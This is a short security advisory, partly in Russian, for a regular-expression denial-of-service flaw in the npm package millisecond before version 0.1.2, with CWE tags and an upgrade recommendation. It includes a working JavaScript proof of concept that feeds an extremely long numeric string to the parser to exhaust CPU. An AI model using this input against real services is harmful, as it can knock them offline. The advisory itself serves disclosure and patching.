Описание
Regular Expression Denial of Service in millisecond
Versions of millisecond prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.
Proof of concept
var ms = require('millisecond');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
ms(genstr(process.argv[2], "5") + " minutea");
Recommendation
Update to version 0.1.2 or later.
Пакеты
Наименование
millisecond
npm
Затронутые версииВерсия исправления
< 0.1.2
0.1.2
Дефекты
CWE-1333
CWE-400
Дефекты
CWE-1333
CWE-400